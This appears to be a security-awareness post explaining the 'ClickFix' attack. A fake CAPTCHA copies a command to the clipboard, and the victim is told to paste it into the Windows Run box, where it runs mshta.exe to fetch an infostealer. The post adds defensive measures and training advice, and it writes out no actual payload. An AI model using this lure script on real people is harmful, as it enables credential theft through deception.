How Attackers Are Using This 3-Step Trick to Turn Victims Into Their Own Hackers!

Here's a simple 3-step trick attackers are using with high success rate (aka "ClickFix Attack"):

No zero-days. No exploits. Just clever psychological manipulation.

Here's how it works:

𝗔𝘁𝘁𝗮𝗰𝗸 𝗙𝗹𝗼𝘄:

1. Attacker sends an email link to the target user baiting them to take action to “fix” a non-existent issue > User clicks on it > A message appears that asks "Verify you're a human" with the button "I'm not a robot" below.
   

2. Victim clicks on "I'm not a robot" > JavaScript in the HTML page triggers the browser to copy a malicious command to the user clipboard > Attacker now needs to just execute this copied text.
   

3. A pop-up window appears asking user to perform 3 simple steps to verify further (refer to pic attached, easy to understand):
   
   - Step 1 says ---> Press Windows button + R (this triggers Windows "run" prompt)
   
   - Step 2 says ---> Press “CTRL” key and the letter “V” at the same time (this pastes malicious code from the site’s virtual clipboard)
   
   - Step 3 says ---> Press the “Enter” key (this causes Windows to execute the code (via Mshta.exe) to download infostealers)
   

4. Infostealer now accesses credentials, keystrokes, other sensitive info on victims system > Exfils stolen info to attacker server!
   

𝗔 𝗙𝗲𝘄 𝗧𝗵𝗼𝘂𝗴𝗵𝘁𝘀:

1. Deception is the greatest weapon in cybercrime. The best attack is the one where the attacker tricks the victim into executing the attack themselves.
   

2. JavaScript cannot directly read clipboard contents without user interaction (for security reasons), but it can write to the clipboard on a button click, which attackers exploit to trick users into pasting malicious commands.
   

3. Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same technology of browser, but outside of the browser. Since it executes outside of browser, attackers use it to bypass browser security settings!
   

4. Attacks such as these are hard to stop due to the human angle involved. But some extreme measures if you'd like to consider: 1) Depending on your environment, consider GPO or registry settings that can restrict execution of PowerShell, mshta.exe, and wscript.exe. 2) Windows group policy restrictions have the option to prevent Windows from executing the “run” command when users hit the Windows key and the “R” key simultaneously.
   

5. With the right endpoint capabilities in place, even if a user makes a mistake, you should still be able to detect and block the infostealer during the download process.
   

6. Run internal phishing tests where users are prompted to copy-paste commands. Teach them: If someone tells you to paste and run something, just do not do it.
   
   This attack teaches a simple lesson: Simple, creative tricks can be just as dangerous as advanced exploits